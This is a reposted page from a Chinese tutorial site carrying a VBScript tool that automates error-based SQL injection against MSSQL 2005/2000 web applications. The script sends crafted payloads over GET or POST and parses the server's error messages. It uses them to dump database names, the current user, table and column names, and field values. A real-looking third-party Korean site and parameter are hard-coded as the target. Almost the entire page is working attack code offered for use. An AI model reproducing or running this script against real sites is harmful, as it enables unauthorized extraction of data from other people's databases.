当前位置: 首页 > 图文教程 > 数据库 > MSSQL > Sql2005注射辅助脚本[粗糙版]

MSSQL
J2EE基础应用:J2EE中SQL语句自动构造方法
SQL Server asp.net 数据提供程序连接池
SQL Server的怪辟:异常与孤立事务
一个修改Oracle数据库用户密码的小诀窍
SQL和Oracle对数据库事务处理的差异性
SQL SERVER应用问题解答13例(三)
设置Proxy Server和SQL Server实现互联网上数据库的安全
SQL Server 7.0 入门(一)
SQL Server 7.0 入门(二)
SQL Server 7.0 入门(三)
SQL Server 7.0 入门(四)
SQL Server 7.0 入门(五)
SQL Server 7.0 入门(七)
SQL Server 7.0 入门(八)
SQL Server XML 和 Web 应用体系结构(一)8
SQL Server XML 和 Web 应用体系结构(二)
SQL Server同Exchange Server结合应用--SQL Mail2
使用SQL Server 7.0建立一个安全的数据库的最好方法是
分布式查询和分布式事务
在SQL Server的存储过程中调用Com组件

MSSQL 中的 Sql2005注射辅助脚本[粗糙版]


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 130 ::
收藏到网摘: n/a

'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 作者:Tr4c3
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入
Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件,D输出到屏幕
Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD
strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性,此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments
If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))
'************************************************************************
' 爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
ResuT("---------------===============================--------------")
ResuT("All The DataBases:")
Do
strData = " and quotename(db_name("&i&"))=0--"
sqlInj(strData)
i = i + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
ResuT("---------------===============================--------------")
ResuT("The Current Database is:")
strData = " and quotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The database User is:")
strData = " and quotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The System_user is:")
strData = " and quotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' 爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
Sub SqlInj(value)
If UCase(method) = "GET" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", strUrl &"?" & value , False
objXML.SetRequestHeader "Referer", strUrl
'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
objXML.send()
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
ElseIf UCase(method) = "POST" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST", strUrl, False
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "Referer", strUrl
objXML.send(UrlEncode(value))
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
End If
End Sub
Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
Set fso = CreateObject("Scripting.FileSystemObject")
Set fso1 = fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
Wscript.Echo(strInfo)
End If
End Function
Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo(" cscript"&.ScriptName&" info--爆基本信息")
.Echo(" cscript"&.ScriptName&" databases--爆所有库名")
.Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
.Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
.Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub